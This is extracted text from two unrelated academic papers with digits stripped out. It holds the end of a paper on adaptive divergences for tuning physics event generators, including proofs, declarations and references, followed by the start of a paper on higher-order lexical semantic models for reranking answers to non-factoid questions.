these benefits were demonstrated on two fine-tuning problems involving pythia event generator and two of the most popular black-box optimization algorithms: bayesian optimization and variational optimization. experiments show that, given the same budget, adaptive divergences yield results up to an order of magnitude closer to the optimum than jensen–shannon divergence. note, that while we consider physics-related simulations, adaptive divergences can be applied to any stochastic simulation. theoretical results presented in this work also hold for divergences other than jensen– shannon divergence. acknowledgements we wish to thank mikhail hushchyn, denis derkach, and marceline ivanovna for useful discussions and suggestions on the text. appendix a : formal definitions and proofs definition a model family m={mα⊆f|α∈[ , ]} is complete and nested, if: (n ) (x → / )∈m ; (n )] m =f; (n ) ∀α,β∈[ , ] :(α<β)⇒(mα⊂mβ). theorem if a model family m={mα ⊆f|α∈[ , ]} is complete and nested, then the family d={dα : (x)× (x)→r|α∈[ , ]}, where: dα(p,q)= log − inf f∈mα l(f ,p,q), ( ) is a complete and ordered with respect to jensen–shannon divergence family of pseudo- divergences. proof let’s introduce function f (x)= / . now we prove the theorem by proving that the family satisfies all properties from definition . property (d ) due to properties (n ) and (n ), f is a member of each set mα. this implies, that dα(p,q)≥ for all α∈[ , ]. for p =q, cross-entropy loss function l(f ,p,q) achieves its minimum in f = f , therefore, dα(p,q)= if p =q for all α∈[ , ]. therefore, for each α∈[ , ] dα is a pseudo-divergence. property (d ) from properties (n ) follows, that for all ≤α<β≤ : dα(p,q)= log − inf f∈mα l(f ,p,q)≥ log − inf f∈mβ l(f ,p,q)=dβ(p,q). borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. property (d ) this property is directly follows from property (n ) and equation eq. ( ). definition if m is a parameterized model family m ={f (θ,·) :x →[ , ]| θ∈ }, then a function r : →r is a proper regularizer for the family m if: (r ) ∀θ∈ :r(θ)≥ ; (r ) ∃θ ∈ : ( f (θ,·)≡ ) ∧(r(θ)= ). theorem if m is a parameterized model family: m ={f (θ,·)|θ ∈ }and m =f, r : →r is a proper regularizer for m , and c : [ , ]→[ ,+∞) is a strictly increasing function such, that c( )= , then the family d={dα : (x)× (x)→r|α∈[ , ]}: dα(p,q) = log − min θ∈ α(p,q) l(f (θ,·),p,q); α(p,q) = arg minθ∈ l r α(θ,p,q); lrα(θ,p,q)=l(f (θ,·),p,q)+c( −α)r(θ); is a complete and ordered with respect to jensen–shannon divergence family of pseudo- divergences. proof we prove the theorem by showing that the family d satisfies all properties from definition . property (d ) due to properties (r ), there exists suchθ , that f (θ ,·)≡ / and r(θ )= . notice, that, for all p and q, lrα(θ ,p,q)= log and l r α(θ,p,q)≥l(f (θ,·),p,q), therefore, dα(p,q)≥ for all p,q∈ (x) and for all α∈[ , ]. for the case p =q, θ also delivers minimum to l(f (θ ,·),p,q)+c( −α)r(θ ), thus, dα(p,q)= if p =q. this proves dα to be a pseudo-divergence for all α∈[ , ]. property (d ) let’s assume that ≤α < β ≤ , yet, for some p and q, dα(p,q) > dβ(p,q). the latter implies, that: min θ∈ α l(f (θ,·),p,q)< min θ∈ β l(f (θ,·),p,q); ( ) where: α= α(p,q) and β = β(p,q). let us pick some model parameters: θα ∈arg minθ∈ αl(f (θ,·),p,q); θβ ∈arg minθ∈ βl(f (θ,·),p,q). since θβ ∈ β, then, by the definition of β(p,q): lrβ(θβ,p,q)≤l r β(θα,p,q). ( ) from the latter and assumption (eq. ) follows, that r(θβ)<r(θα). 
by the conditions of the theorem, c =c( −α)−c( −β)> and: c ·r(θβ)<c ·r(θα). ( ) adding inequality eq. ( ) to inequality eq. ( ): lrα(θβ,p,q)<l r α(θα,p,q), which contradicts the definition of θα. this, in turn, implies that the assumption eq. ( ) contradicts conditions of the theorem. property (d ) since c( )= and m =f, d = jsd by the definition. borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. appendix a . proof of theorem theorem if addis an adaptive divergence produced by a complete and ordered with respect to jensen–shannon divergence family of pseudo-divergences d, then for any two distributions p and q: jsd(p,q)= if and only if ad(p,q)= . proof for convenience, we repeat the definition of an adaptive divergence add here: add(p,q)= inf { dα(p,q)|dα(p,q)≥( −α)log } . ( ) firstly, we prove that from jsd(p,q)= follows add(p,q)= . due to property (d ), d (p,q)= jsd(p,q)= , therefore, ∀α∈[ , ] :dα(p,q)= due to properties (d ) (pseudo-divergences form a non-decreasing sequence) and (p ) (non-negativity of pseudo-divergences), which, in turn, implies that ad(p,q)= inf{ }= . secondly, we prove that from add(p,q)= follows jsd(p,q)= . let’s assume that, for some p and q, ad(p,q)= , but jsd(p,q)=c > . let us define the set of active capacities ad(p,q) as follows: ad(p,q)= { α|dα(p,q)≥( −α)log } . ( ) note, that for every proper family d and for every pair of p and q: { }⊆ad(p,q) and, if α∈ad(p,q) then [α, ]⊆ad(p,q). the latter follows from property (d ) (pseudo-divergences form a non-decreasing sequence) and the fact, that ( −α)log is a strictly decreasing function.the previous statement implies that there are three possible forms of ad(p,q): . a single point: ad(p,q)={ }; . an interval: ad(p,q)=[β, ]; . a half-open interval: ad(p,q)=(β, ]; for some β∈[ , ). the first case would contradict our assumptions, since add(p,q)= inf{d (p,q)}= c > . to address the last two cases, note, that ∀α ∈ ad(p,q) : dα(p,q)≥ ( −β)log > due to the definition of ad(p,q). however, this implies that add(p,q)= inf{dα(p,q)|α∈ad(p,q)}≥( −β)log > , which contradicts our assumptions.from the statements above, we can conclude that if add(p,q)= , then jsd(p,q)= . combined with the previouly proven (jsd(p,q)= )⇒(add(p,q)= ), this finishes the proof. appendix a . source of the acceleration figures , and demonstrate that usage of adaptive divergence allows to accelerate adversarial optimization and lower requirements on the number of generator calls clearly play a major role. nevertheless, this acceleration can be potentially attributed to the changes in the shape of the target function. figure shows convergence plots for the experiments described above; however, the x-axis corresponds to the optimization step rather than number of generator calls. these convergence plots demonstrate that changes in shape either do not affect convergence speed (figs. a and b) or have a negative impact (fig. c). borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . . . . . . optimization step eu cl id ea n di st an ce to th e so lu tio n jsd linear ad logarithmic ad a optimization step eu cl id ea n di st an ce to th e so lu tio n jsd linear ad logarithmic ad b optimization step × × × × eu cl id ea n di st an ce to th e so lu tio n jsd ad, dropout ad, l c figure convergence plots as functions of optimization step: (a) xor-like synthetic dataset, (b) pythia hyper-parameter tuning, (c) pythia alignment. 
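Since the extraction stripped most digits from the appendix, a cleaned-up restatement of its central constructions may help. The lost constants are restored here as 1/2, log 2, and the interval [0, 1], which is what the surrounding proofs require; the environment names are only illustrative.

```latex
\begin{definition}
A family $\mathcal{M}=\{\mathcal{M}_\alpha \subseteq \mathcal{F} \mid \alpha\in[0,1]\}$ is
\emph{complete and nested} if
(N1) $(x \mapsto \tfrac12)\in\mathcal{M}_0$;\;
(N2) $\mathcal{M}_1=\mathcal{F}$;\;
(N3) $\forall\,\alpha,\beta\in[0,1]:(\alpha<\beta)\Rightarrow(\mathcal{M}_\alpha\subset\mathcal{M}_\beta)$.
\end{definition}

\begin{theorem}
For a complete and nested $\mathcal{M}$, the family $\{D_\alpha\}_{\alpha\in[0,1]}$ with
\[
  D_\alpha(P,Q)=\log 2-\inf_{f\in\mathcal{M}_\alpha} L(f,P,Q)
\]
is complete and ordered with respect to the Jensen--Shannon divergence; the regularized
construction instead minimizes
$L^{R}_{\alpha}(\theta,P,Q)=L(f(\theta,\cdot),P,Q)+c(1-\alpha)\,R(\theta)$,
where $R$ is a proper regularizer and $c$ is strictly increasing with $c(0)=0$.
\end{theorem}

% Adaptive divergence and its set of active capacities (Appendix A.2):
\[
  \mathrm{AD}_{\mathcal{D}}(P,Q)=\inf\{\,D_\alpha(P,Q)\mid D_\alpha(P,Q)\ge(1-\alpha)\log 2\,\},\qquad
  A_{\mathcal{D}}(P,Q)=\{\,\alpha\in[0,1]\mid D_\alpha(P,Q)\ge(1-\alpha)\log 2\,\}.
\]
```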
curves are interpolated, median curves are shown as solid lines, bars indicate th and th percentiles. for visual clarity curves are interpolated/extrapo- lated up to the median total number of steps for the corresponding method. full-size doi: . /peerjcs. /fig- additional information and declarations funding the research leading to these results has received funding from russian science foundation under grant agreement n - - . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: russian science foundation: - - . competing interests the authors declare there are no competing interests. author contributions • maxim borisyak conceived and designed the experiments, performed the experiments, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • tatiana gaintseva analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • andrey ustyuzhanin analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the code for the experiments is available at https://github.com/hse-lambda/rapid- ao/. borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://github.com/hse-lambda/rapid-ao/ https://github.com/hse-lambda/rapid-ao/ http://dx.doi.org/ . /peerj-cs. references allison j, amako k, apostolakis j, arce p, asai m, aso t, bagli e, bagulya a, banerjee s, barrand g, beck b, bogdanov a, brandt d, brown j, burkhardt h, canal p, cano-ott d, chauvie s, cho k, cirrone g, cooperman g, corts-giraldo m, cosmo g, cuttone g, depaola g, desorgher l, dong x, dotti a, elvira v, folger g, francis z, galoyan a, garnier l, gayer m, genser k, grichine v, guatelli s, guye p, gumplinger p, howard a, hivnov i, hwang s, incerti s, ivanchenko a, ivanchenko v, jones f, jun s, kaitaniemi p, karakatsanis n, karamitros m, kelsey m, kimura a, koi t, kurashige h, lechner a, lee s, longo f, maire m, mancusi d, mantero a, mendoza e, morgan b, murakami k, nikitina t, pandola l, paprocki p, perl j, petrovi i, pia m, pokorski w, quesada j, raine m, reis m, ribon a, fira ar, romano f, russo g, santin g, sasaki t, sawkey d, shin j, strakovsky i, taborda a, tanaka s, tom b, toshito t, tran h, truscott p, urban l, uzhinsky v, verbeke j, verderi m, wendt b, wenzel h, wright d, wright d, yamashita t, yarba j, yoshida h. . recent developments in geant . nuclear instruments and methods in physics research section a: accelerators, spectrometers, detectors and associated equipment : – doi . /j.nima. . . . arjovsky m, chintala s, bottou l. . wasserstein gan. arxiv preprint. arxiv: . . baydin ag, shao l, bhimji w, heinrich l, naderiparizi s, munk a, liu j, gram- hansen b, louppe g, meadows l, torr p, lee v, cranmer k, prabhat m, wood f. . efficient probabilistic inference in the quest for physics beyond the standard model. in: advances in neural information processing systems. – . bellemare mg, danihelka i, dabney w, mohamed s, lakshminarayanan b, hoyer s, munos r. . the cramer distance as a solution to biased wasserstein gradients. arxiv preprint. arxiv: . . choi y, choi m, kim m, ha j-w, kim s, choo j. . 
stargan: unified generative adversarial networks for multi-domain image-to-image translation. in: ieee/cvf conference on computer vision and pattern recognition. – . dumoulin v, belghazi i, poole b, mastropietro o, lamb a, arjovsky m, courville a. . adversarially learned inference. arxiv preprint. arxiv: . . friedman jh. . greedy function approximation: a gradient boosting machine. annals of statistics ( ): – . goodfellow i, pouget-abadie j, mirza m, xu b, warde-farley d, ozair s, courville a, bengio y. . generative adversarial nets. in: advances in neural information processing systems. – . gulrajani i, ahmed f, arjovsky m, dumoulin v, courville ac. . improved training of wasserstein gans. in: advances in neural information processing systems. – . hossain s, jamali k, li y, rudzicz f. . chaingan: a sequential approach to gans. arxiv preprint. arxiv: . . ilten p, williams m, yang y. . event generator tuning using bayesian optimization. journal of instrumentation ( ):article p doi . / - / / /p . borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.nima. . . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . / - / / /p http://dx.doi.org/ . /peerj-cs. isola p, zhu j-y, zhou t, efros aa. . image-to-image translation with conditional adversarial networks. in: proceedings of the ieee conference on computer vision and pattern recognition. – . karras t, aila t, laine s, lehtinen j. . progressive growing of gans for improved quality, stability, and variation. arxiv preprint. arxiv: . . kingma dp, ba j. . adam: a method for stochastic optimization. arxiv preprint. arxiv: . . kodali n, abernethy j, hays j, kira z. . on convergence and stability of gans. arxiv preprint. arxiv: . . li j, madry a, peebles j, schmidt l. . towards understanding the dynamics of generative adversarial networks. arxiv preprint. arxiv: . . liu h, simonyan k, yang y. . darts: differentiable architecture search. arxiv preprint. arxiv: . . louppe g, hermans j, cranmer k. . adversarial variational optimization of non- differentiable simulators. arxiv preprint. arxiv: . . mescheder l, geiger a, nowozin s. . which training methods for gans do actually converge? in: international conference on machine learning. – . metz l, poole b, pfau d, sohl-dickstein j. . unrolled generative adversarial networks. in: iclr. mockus j. . bayesian approach to global optimization: theory and applications. vol. . dordrecht: springer science & business media. prokhorenkova l, gusev g, vorobev a, dorogush av, gulin a. . catboost: unbiased boosting with categorical features. in: advances in neural information processing systems. – . radford a, metz l, chintala s. . unsupervised representation learning with deep convolutional generative adversarial networks. arxiv preprint. arxiv: . . roth k, lucchi a, nowozin s, hofmann t. . stabilizing training of generative adversarial networks through regularization. advances in neural information pro- cessing systems. – available at https://papers.nips.cc/paper/ -stabilizing- training-of-generative-adversarial-networks-through-regularization.pdf . simonyan k, zisserman a. . very deep convolutional networks for large-scale image recognition. arxiv preprint. arxiv: . . sjöstrand t, ask s, christiansen jr, corke r, desai n, ilten p, mrenna s, prestel s, rasmussen co, skands pz. . an introduction to pythia . . computer physics communications : – . sjöstrand t, mrenna s, skands p. . pythia . 
physics and manual. journal of high energy physics ( ):article . skands p, carrazza s, rojo j. . tuning pythia . : the monash tune. the eu- ropean physical journal c ( ):article doi . /epjc/s - - -y. sønderby ck, caballero j, theis l, shi w, huszár f. . amortised map inference for image super-resolution. arxiv preprint. arxiv: . . sønderby ck, caballero j, theis l, shi w, huszár f. . amortised map inference for image super-resolution. arxiv preprint. arxiv: . . borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://arxiv.org/abs/ . https://papers.nips.cc/paper/ -stabilizing-training-of-generative-adversarial-networks-through-regularization.pdf https://papers.nips.cc/paper/ -stabilizing-training-of-generative-adversarial-networks-through-regularization.pdf http://arxiv.org/abs/ . http://dx.doi.org/ . /epjc/s - - -y http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. srivastava n, hinton g, krizhevsky a, sutskever i, salakhutdinov r. . dropout: a simple way to prevent neural networks from overfitting. the journal of machine learning research ( ): – . the atlas collaboration. . the atlas simulation infrastructure. european physi- cal journal c: particles and fields ( ): – doi . /epjc/s - - - . wierstra d, schaul t, glasmachers t, sun y, peters j, schmidhuber j. . natural evolution strategies. the journal of machine learning research ( ): – . borisyak et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /epjc/s - - - http://dx.doi.org/ . /peerj-cs. higher-order lexical semantic models for non-factoid answer reranking daniel fried , peter jansen , gustave hahn-powell , mihai surdeanu , and peter clark university of arizona, tucson, az, usa allen institute for artificial intelligence, seattle, wa, usa {dfried,pajansen,hahnpowell,msurdeanu}@email.arizona.edu peterc@allenai.org abstract lexical semantic models provide robust performance for question answering, but, in general, can only capitalize on direct ev- idence seen during training. for example, monolingual alignment models acquire term alignment probabilities from semi- structured data such as question-answer pairs; neural network language models learn term embeddings from unstructured text. all this knowledge is then used to estimate the semantic similarity between question and answer candidates. we in- troduce a higher-order formalism that al- lows all these lexical semantic models to chain direct evidence to construct indirect associations between question and answer texts, by casting the task as the traversal of graphs that encode direct term associa- tions. using a corpus of , questions from yahoo! answers, we experimentally demonstrate that higher-order methods are broadly applicable to alignment and lan- guage models, across both word and syn- tactic representations. we show that an important criterion for success is control- ling for the semantic drift that accumu- lates during graph traversal. all in all, the proposed higher-order approach improves five out of the six lexical semantic mod- els investigated, with relative gains of up to + % over their first-order variants. 
introduction open-domain question answering (qa), which finds short textual answers to natural language questions, is often viewed as the successor to key- word search (etzioni, ) and one of the most difficult and widely applicable end-user applica- tions of natural language processing (nlp). from syntactic parsing, discourse processing, and lex- ical semantics, qa necessitates a level of func- tionality across a variety of topics that make it a natural, yet challenging, proving ground for many aspects of nlp. here, we address a partic- ularly challenging qa subtask: open-domain non- factoid qa, where queries take the form of com- plex questions (e.g., manner or how questions), and answers range from single sentences to en- tire paragraphs. because this task is so complex and large in scope, current state-of-the-art open- domain systems perform at only about % p@ , or answering roughly one out of three questions correctly (jansen et al., ). in this paper we focus on answer ranking (ar), a key component of non-factoid qa that focuses on ordering candidate answers based on the like- lihood that they capture the information needed to answer a question. unlike keyword search, berger ( ) observed that lexical matching methods are generally insufficient for qa, where questions and answers often have little to no lexical overlap (as in the case of where should we go for breakfast? and zoe’s diner has great pancakes). previous work has shown that lexical semantics (ls) mod- els are well suited to bridging this “lexical chasm”, and at least two flavors of lexical semantics have been successfully applied to qa. the first treats qa as a monolingual alignment problem, learning associations between words (or other structures) that appear in question-answer pairs (surdeanu et al., ; yao et al., ). the second computes the semantic similarity between question and an- swer using language models acquired from rele- vant texts (yih et al., ; jansen et al., ). here we argue that while these models begin to bridge the “lexical chasm”, many still suffer from sparsity and only capitalize on direct evi- dence. returning to our example question, if we also train on the qa pair what goes well with pan- cakes? and hashbrowns and toast, we can use the transactions of the association for computational linguistics, vol. , pp. – , . action editor: sharon goldwater. submission batch: / ; revision batch / ; published / . c© association for computational linguistics. distributed under a cc-by-nc-sa . license. figure : a hypothetical graph derived from a lexical se- mantic alignment model. indirect association between breakfast – pancakes and pancakes – hashbrowns to locate additional answers for where to visit for breakfast, including regee’s has the best hashbrowns in town. we can represent ls models as a graph, as in figure . for a word-based alignment model, the graph nodes represent individual words, and the (directed) edges capture the likelihood of a word wa appearing in a gold answer given word wq in the question. grounding this in our example, w may represent breakfast, w pancakes, and w hashbrowns. for a language model, the edges cap- ture the similarity of contexts between the words in the nodes. for both alignment and language model graphs, we observe that semantic associa- tion between two words (or structures) stored in the nodes can be determined by investigating the different paths that connect these two nodes, even when they are not directly connected. 
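A toy illustration of this idea follows: given only the direct edge weights that a first-order alignment model learns, an indirect association can be read off by chaining a small number of edges, and capping the path length keeps the chains on-topic. This is not the interpolation method developed later in the paper, just a sketch of reading indirect evidence off such a graph; all edge weights are invented for the example.

```python
from collections import defaultdict

# Toy direct-association graph: edges[a][q] ~ likelihood of question term q given
# answer term a, as a first-order alignment model would learn it (numbers invented).
edges = {
    "pancakes":   {"breakfast": 0.4, "syrup": 0.3},
    "hashbrowns": {"pancakes": 0.5, "potato": 0.2},
}

def indirect_association(src, dst, max_hops=2):
    """Best product of direct-association weights over paths of at most max_hops edges;
    the hop limit is what keeps the indirect evidence short and on-context."""
    best = defaultdict(float)
    frontier = {src: 1.0}
    for _ in range(max_hops):
        nxt = {}
        for node, score in frontier.items():
            for neighbour, weight in edges.get(node, {}).items():
                candidate = score * weight
                if candidate > best[neighbour]:
                    best[neighbour] = candidate
                    nxt[neighbour] = candidate
        frontier = nxt
    return best[dst]

# No direct edge hashbrowns -> breakfast, but a two-hop chain exists:
print(indirect_association("hashbrowns", "breakfast"))  # 0.5 * 0.4 = 0.2
```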
we call this class of models higher-order lexical models, in contrast to the first-order lexical mod- els introduced in previous work, which rely only on direct evidence to estimate association strength. for example, all alignment models in previous work can estimate p(wq|wa), i.e., the probabil- ity of generating the question word wq if the an- swer contains the word wa, only if this pair has been seen at least once in training. on the other hand, our approach can estimate p(wq|wa) from indirect evidence, e.g., from chaining two distinct question/answer pairs that contain the words (wq, wi) and (wi, wa), respectively. the contributions of this work are: . this is the first work to our knowledge that proposes higher-order ls models for qa. we show that an important criterion for success is controlling for the semantic drift that ac- cumulates in the graph traversal paths, which plagues traditional random walk algorithms. for example, we empirically demonstrate that paths up to a length of three are gener- ally beneficial, but longer paths hurt or do not improve performance. . we show that a variety of ls models and representations, including alignment and lan- guage models, over both words and syntac- tic structures, can be adapted to the proposed higher-order formalism. in this latter respect we introduce a novel syntax-based variant of the neural network language model (nnlm) of mikolov et al. ( ) that models syntac- tic dependencies rather than words, which al- lows it to capture knowledge that is comple- mentary to that of word-based nnlms. . the training process for alignment models requires a large corpus of qa pairs. due to these resource requirements, we evaluate our higher-order ls models on a commu- nity question answering (cqa) task (wang et al., ; jansen et al., ) across thousands of how questions, and show that most higher-order models perform signifi- cantly better than their first-order variants. . we demonstrate that language models and alignment models capture complementary in- formation, and can be combined to improve the performance of the cqa system for man- ner questions. related work we focus on statistical ls methods for open- domain qa, in particular cqa tasks, such as the ones driven by yahoo! answers datasets (wang et al., ; jansen et al., ). berger et al. ( ) were the first to propose a statistical ls model to “bridge the lexical chasm” between questions and answers for a qa task. building off this work, a number of ls models us- ing either words or other syntactic and semantic structures have been proposed for qa (echihabi and marcu, ; soricut and brill, ; rie- zler et al., ; surdeanu et al., ; yao et al., ; jansen et al., ), or related tasks, such as semantic textual similarity (sultan et al., ). however, all of these models fall into the class of first-order models. to our knowledge, this work is the first to investigate higher-order ls models for qa, which can take advantage of indirect ev- idence, i.e., the “neighbors of neighbors” in the association graph. second-order lexical models have recently been brought to bear on a variety of other nlp tasks. zapirain et al. ( ) use a second-order model based on distributional similarity (lin, ) to improve a selectional preference model, and lee et al. ( ) use a similar approach for coreference resolution. our work expands on these ideas with models of arbitrary order, an approach to control semantic drift, and an application to qa. 
this work falls under the larger umbrella of algorithms for graph-based inference, which have been successfully applied to other nlp and information retrieval problems, such as rela- tion extraction (chakrabarti and agarwal, ; chakrabarti, ; lao and cohen, ), in- ference over knowledge bases (lao et al., ), name disambiguation (minkov et al., ), and search (bhalotia et al., ; tong et al., ). while many of these approaches use random walk algorithms, in pilot experiments we observed that random walks, such as pagerank (pr) (page et al., ), tend to accumulate semantic drift from the originating node because they consider all possi- ble paths in the graph. this semantic drift reduces the quality of the higher-order associations, which impacts qa performance. here we implement a conservative graph traversal algorithm, similar in spirit to the “cautious bootstrapping” algorithm of yarowsky (whitney and sarkar, ; yarowsky, ). by constraining the traversal paths, our al- gorithm runs two orders of magnitude faster than pr, while controlling for semantic drift. approach the architecture of our proposed qa framework is illustrated in figure . here we evaluate both first- order and higher-order ls models in the context of community question answering (cqa), using a large dataset of qa pairs from yahoo! answers . we use a standard cqa evaluation task (jansen et al., ), where one must rank a set of user- generated answers to a given question, such that the community-selected best answer appears in the top position. more specifically, for a given question, the candidate retrieval (cr) component fetches all its community-generated answers from the answer collection, and gives each answer can- didate an initial ranking using shallow informa- http://answers.yahoo.com figure : architecture of the reranking framework for qa, showing a reranking component that incorporates two classes of lexical semantic models (alignment and neural network language models), implemented over two representations of content (words and syntax). tion retrieval scoring. these answer candidates are then passed on to the answer reranking com- ponent, the focus of this work. the answer reranking (ar) component ana- lyzes the answer candidates using more expensive techniques to extract first-order and higher-order ls features, and these features are then used in concert with a learning framework to rerank the candidates and elevate correct answers to higher positions. for the learning framework, we use svmrank, a variant of support vector machines for structured output adapted to ranking prob- lems. in addition to these features, each reranker also includes a single feature containing the score of each candidate, as computed by the above can- didate retrieval component. first-order lexical models we next introduce a series of first-order ls mod- els, which serve as the foundation for the higher- order models discussed in the next section. . neural network language models inspired by previous work (yih et al., ; jansen et al., ), we adapt the word vec nnlm of we used the same scoring as jansen et al. ( ): co- sine similarity between the question and candidate answer’s lemma vector representations, with lemmas weighted using tf.idf (ch. , (manning et al., )). http://www.cs.cornell.edu/people/tj/ svm_light/svm_rank.html including these scores as features in the reranker model is a common strategy that ensures that the reranker takes ad- vantage of the analysis already performed by the cr model. 
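As a concrete reading of the retrieval scoring described in the footnote above, the sketch below ranks candidate answers by tf.idf-weighted cosine similarity to the question. It is only an approximation of the described setup: it works on raw tokens rather than lemmas, and the idf statistics are fitted on the tiny example collection instead of a large answer corpus.

```python
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity

def rank_candidates(question, answers):
    """Shallow CR-style scoring: tf.idf-weighted cosine similarity between the
    question and each candidate answer, highest first."""
    matrix = TfidfVectorizer().fit_transform([question] + answers)
    scores = cosine_similarity(matrix[0], matrix[1:]).ravel()
    return sorted(zip(answers, scores), key=lambda pair: -pair[1])

ranked = rank_candidates(
    "where should we go for breakfast?",
    ["you should go to zoe's diner for breakfast.", "the game starts at noon."],
)
```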
http://answers.yahoo.com http://www.cs.cornell.edu/people/tj/svm_light/svm_rank.html http://www.cs.cornell.edu/people/tj/svm_light/svm_rank.html mikolov et al. ( ) to this qa task. in particu- lar, we use their skip-gram model with hierarchi- cal sampling. this model predicts the context of a word given the word itself, and through this pro- cess embeds words into a latent conceptual space with a fixed number of dimensions. consequently, related words tend to have vector representations that are close to each other in this space. this type of predictive algorithm has been found to perform considerably better than count-based approaches to distributional similarity on a variety of seman- tic tasks (baroni et al., ). we derive four ls measures from these vec- tors, which are then are included as features in the reranker. the first is a measure of the over- all similarity of the question and answer candi- date, which is computed as the cosine similarity between two composite vectors. these composite vectors are assembled by summing the vectors for individual question (or answer candidate) words, and re-normalizing this composite vector to unit length. in addition to this overall similarity score, we compute the pairwise similarities between each word in the question and answer candidates, and include as features the average, minimum, and maximum pairwise similarities. . alignment models berger et al. ( ) showed that learning question- to-answer transformations using a statistical ma- chine translation (smt) model begins to “bridge the lexical chasm” between questions and an- swers. we build upon this observation, using the ibm model (brown et al., ) variant of sur- deanu et al. ( ) to determine the probability that a question q is a translation of an answer a, p(q|a): p(q|a) = ∏ q∈q p(q|a) ( ) p(q|a) = ( −λ)pml(q|a) + λpml(q|c) ( ) pml(q|a) = ∑ a∈a (t(q|a)pml(a|a)) ( ) where the probability that the question term q is generated from answer a, p(q|a), is smoothed using the prior probability that the term q is gen- erated from the entire collection of answers c, pml(q|c). pml(q|a) is computed as the sum of we also tried the multiplicative strategy for word-vector combination of levy and goldberg ( b), but it did not improve our results. the probabilities that the question term q is a trans- lation of any answer term a, t(q|a), weighted by the probability that a is generated from a. the translation table for t(q|a) is computed us- ing giza++ (och and ney, ). similar to surdeanu et al. ( ) we: (a) set pml(q|c) to a small value for out-of-vocabulary words; (b) modify the t(.|.) distributions to guar- antee that the probability of translating a word to itself, i.e., t(w|w), is highest (murdock and croft, ); and (c) tune the smoothing parameter λ on a development corpus. qa systems generally use the above model to determine the global alignment probability be- tween a given question and answer candidate, p(q|a). a novel contribution of our work is that we also use the alignment model’s proba- bility distributions (from a source word to des- tination words) as distributed representations for source words, based on the observation that words with similar alignment distributions are likely to have a similar meaning. formally, we denote the alignment vector representation for the ith word in the vocabulary as w(i), and define the jth en- try in the vector as w(i)j = t(wordj|wordi), where t(.|.) is the translation probability distri- bution from eq. . 
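A small sketch of the smoothed translation-based scoring in Eqs. (1)-(3) may clarify how the pieces fit together; the translation-table layout and the collection distribution are placeholder data structures, and the smoothing weight is a stand-in since the tuned value of λ is not reproduced here. Note that the rows of this same translation table, t(·|word_i), are exactly the alignment vectors w(i) introduced just above.

```python
import math

def log_p_question_given_answer(question_terms, answer_terms, t_table,
                                collection_prob, lam=0.5):
    """Smoothed IBM-Model-1-style estimate of P(Q|A), Eqs. (1)-(3).
    t_table[a][q] = t(q|a); collection_prob[q] = P_ml(q|C); lam is the smoothing
    weight lambda (0.5 is only a placeholder; the paper tunes it on development data).
    Returns the log-probability for numerical stability."""
    log_p = 0.0
    for q in question_terms:
        # P_ml(q|A) = sum_a t(q|a) * P_ml(a|A), with P_ml(a|A) the relative frequency of a in A
        p_ml_qa = sum(t_table.get(a, {}).get(q, 0.0) for a in answer_terms) / max(len(answer_terms), 1)
        p_q = (1.0 - lam) * p_ml_qa + lam * collection_prob.get(q, 1e-9)
        log_p += math.log(max(p_q, 1e-300))
    return log_p
```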
that is, the jth entry of the vector for word i is the conditional probability of seeing wordj in a question, given that wordi was seen in a corresponding answer. the vector for each word then represents a discrete (conditional) probability distribution. to compare two words, we use the square root of the jensen-shannon di- vergence (jsd) between their conditional distri- butions. let m(i,j) be the element-wise aver- age of the vectors w(i) and w(j), that is (w(i) + w(j))/ , and let k(w,v) be the kullback-leibler divergence between distributions (represented as vectors) w and v: k(w,v) = |v |∑ i= wi ln wi vi ( ) where |v | is the vocabulary size (and the dimen- sionality of w). then the distance between words i and j is j(w(i), w(j)) = √ k(w(i), m(i, j)) + k(w(j), m(i, j)) ( ) we use the square root of the jensen-shannon diver- gence, derived from kullback-leibler divergence, since it is a distance metric (in particular it is finite and symmetric). we derive four additional ls features from these alignment vector representations, which par- allel the features derived from the nnlm vec- tor representations (§ . ). the first is the jsd between the composite alignment vectors for the question and the answer candidate, where the composite is constructed by summing the vec- tors for individual question (or answer candidate) words, and dividing by the number of vectors summed. we also generate features from the av- erage, minimum, and maximum pairwise jsd between words in the question and words in the answer candidate. in practice, we have found that the addition of these four features considerably improves the performance of all alignment mod- els investigated for the qa task. . modeling syntactic structures surdeanu et al. ( ) demonstrated that align- ment models can readily capitalize on represen- tations other than words, including representa- tions of syntax. here we expand on their work and explore three syntactic variations of the align- ment and nnlm models. for these models we make use of collapsed syntactic dependencies with processed cc complements (de marneffe et al., ), extracted from the annotated english gi- gaword (napoles et al., ). the first model is a straightforward adaptation of the alignment model in § . , where the repre- sentations of questions and answers are changed from bags of words to “bags of syntactic depen- dencies” (surdeanu et al., ). that is, the terms to be aligned (q and a in eq. to ) become 〈head,label,dependent〉 dependencies, such as 〈eat,dobj,pancakes〉, rather than words. the motivation behind this change is that it allows the model to align simple propositions rather than words, which are a more accurate representation of the information encoded in the question. while tuning on the development set of questions we found that unlabeled dependencies, which ignore the middle term in the above tuples, performed better than labeled dependencies, possibly due to the sparsity of the labeled dependencies. as such, all our dependency alignment models use unla- beled dependencies. the second model adapts the idea of working with bags 